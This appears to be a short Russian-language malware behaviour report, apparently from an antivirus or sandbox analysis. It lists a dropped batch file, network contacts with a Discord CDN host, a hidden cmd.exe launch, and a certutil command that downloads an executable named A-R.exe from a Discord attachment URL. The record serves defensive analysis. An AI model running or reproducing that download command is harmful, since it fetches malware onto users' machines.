Техническая информация
- %TEMP%\b9bd.tmp\c330.tmp\c331.bat
- 'cd#.##scordapp.com':443
- 'cd#.##scordapp.com':443
- DNS ASK cd#.##scordapp.com
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\B9BD.tmp\C330.tmp\C331.bat <Полный путь к файлу>"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\B9BD.tmp\C330.tmp\C331.bat <Полный путь к файлу>"
- '<SYSTEM32>\certutil.exe' -urlcache -split -f "https://cdn.discordapp.com/attachments/878412710423969863/993691797870088272/A-R.exe" A-R.exe